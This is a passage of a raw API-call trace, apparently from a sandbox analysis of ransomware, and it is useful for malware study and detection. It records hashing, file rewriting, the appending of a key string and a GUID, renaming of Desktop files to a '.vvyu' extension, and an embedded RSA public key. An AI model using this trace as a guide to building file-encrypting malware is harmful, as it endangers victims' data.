hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.301] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.301] GetLastError () returned 0x0 [0188.301] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.301] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.302] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.302] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.302] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x107e0) returned 0x2ae3ea0 [0188.302] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2578 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae25c0 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.304] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2af4688 [0188.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af5168 [0188.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d8e0 [0188.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2af48a8 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af48a8 | out: hHeap=0x2c0000) returned 1 [0188.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4688 | out: hHeap=0x2c0000) returned 1 [0188.308] GetCurrentThreadId () returned 0x5d8 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee2f0 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.308] GetCurrentThreadId () returned 0x5d8 [0188.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4688 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af5168 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2af4898 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af5380 [0188.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5380 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4898 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae25c0 | out: hHeap=0x2c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4688 | out: hHeap=0x2c0000) returned 1 [0188.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.318] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x107d2, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x107d2, lpOverlapped=0x0) returned 1 [0188.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.319] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x107d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.319] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.320] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.321] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.321] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.321] CloseHandle (hObject=0x584) returned 1 [0188.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae3ea0 [0188.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.323] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\eSfxo-E.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\esfxo-e.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\eSfxo-E.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\esfxo-e.jpg.vvyu")) returned 1 [0188.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.327] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.330] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6527610, ftCreationTime.dwHighDateTime=0x1d8a03e, ftLastAccessTime.dwLowDateTime=0x9a120ac0, ftLastAccessTime.dwHighDateTime=0x1d8a6fd, ftLastWriteTime.dwLowDateTime=0x9a120ac0, ftLastWriteTime.dwHighDateTime=0x1d8a6fd, nFileSizeHigh=0x0, nFileSizeLow=0x300f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i_u5ln.wav", cAlternateFileName="")) returned 1 [0188.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae25c0 [0188.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae25c0 | out: hHeap=0x2c0000) returned 1 [0188.330] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\i_u5ln.wav") returned=".wav" [0188.330] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\i_u5ln.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\i_u5ln.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.331] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=12303) returned 1 [0188.331] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.336] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2fe9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.336] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.339] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.339] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x300f, lpOverlapped=0x0) returned 1 [0188.340] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.340] lstrlenA (lpString="-----BEGIN PUBLIC 